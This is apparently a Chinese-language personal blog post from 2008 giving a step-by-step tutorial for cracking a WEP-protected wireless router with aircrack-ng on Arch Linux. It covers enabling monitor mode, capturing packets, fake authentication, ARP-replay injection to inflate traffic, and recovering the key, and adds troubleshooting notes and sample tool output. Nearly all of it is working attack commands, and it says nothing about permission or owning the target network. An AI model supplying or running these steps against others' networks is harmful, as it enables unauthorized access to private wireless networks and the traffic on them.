if 2008-10-13
系统:Archlinux,无线网卡:TP-LINK321G+,加密方式:WEP
破解前的准备:
安装aircrack-ng,安装iw(看需要)
破解过程:
1. 启动无线网卡的监控模式,终端中运行(wlan0是无线网卡的端口,可在终端中输入 ifconfig -a 查看)
$ sudo airmon-ng start wlan0
2. 查看有哪些采用wep加密的路由器(AP)在线及其详细信息(启动监控模式后无线网的端口是 mon0)
$ sudo airodump-ng mon0
然后按 ctrl+c 退出,保留终端
3. 另开一个终端,运行
$ sudo airodump-ng -c 6 --bssid AP's MAC -w wep mon0
其中6是AP的信道(channel),AP'sMAC是路由器的MAC地址,wep的是抓下来的数据包DATA保存的文件名
4. 再另开一个终端,与AP建立虚拟连接
$ sudo aireplay-ng -1 0 -a AP's MAC -h My MAC mon0
5. 建立虚拟连接成功后,运行
$ sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC mon0
回头看下步骤3的终端是不是DATA在开始飞涨?
6. 收集5000个以上的DATA之后,开始进行解密 。另开一个终端,运行
$ sudo aircrack-ng wep*.cap
如果暂时没算出来的话,继续等,aircrack-ng 会在DATA每增加5000个之后自动再次运行,直到算出密码为止
7. 破解成功后,关闭监控模式
$ sudo airmon-ng stop mon0
我遇到的问题及其解决:
第一步,显示
ERROR: Neither the sysfs interface links nor the iw command is available.
Please download and install iw from http://dl.aircrack-ng.org/iw.tar.bz2
按提示安装iw即可
第四步,虚拟连接成功的话应该显示
12:52:28 Waiting for beacon frame (BSSID: 00:19:E0:XX:XX:XX) on channel 8
12:52:28 Sending Authentication Request (Open System) [ACK]
12:52:28 Authentication successful
12:52:28 Sending Association Request [ACK]
12:52:29 Association successful :-) (AID: 1)
但我的是不断地循环显示
13:04:56 Waiting for beacon frame (BSSID: 00:19:E0:XX:XX:XX) on channel 8
13:04:56 Sending Authentication Request (Open System) [ACK]
13:04:56 Authentication successful
13:04:56 Sending Association Request [ACK]
13:04:57 Got a deauthentication packet! (Waiting 3 seconds)
没关系,另开一个终端,继续第五步 (在经过若干次或长或短的循环后,也可能会虚拟连接成功)
我重新试了几次,发现第五步时前面的DATA不一定会“飞涨”,原因不明,也许是信号不好?
如果DATA增长缓慢,就不好破解了,所以只好重来,多试几次。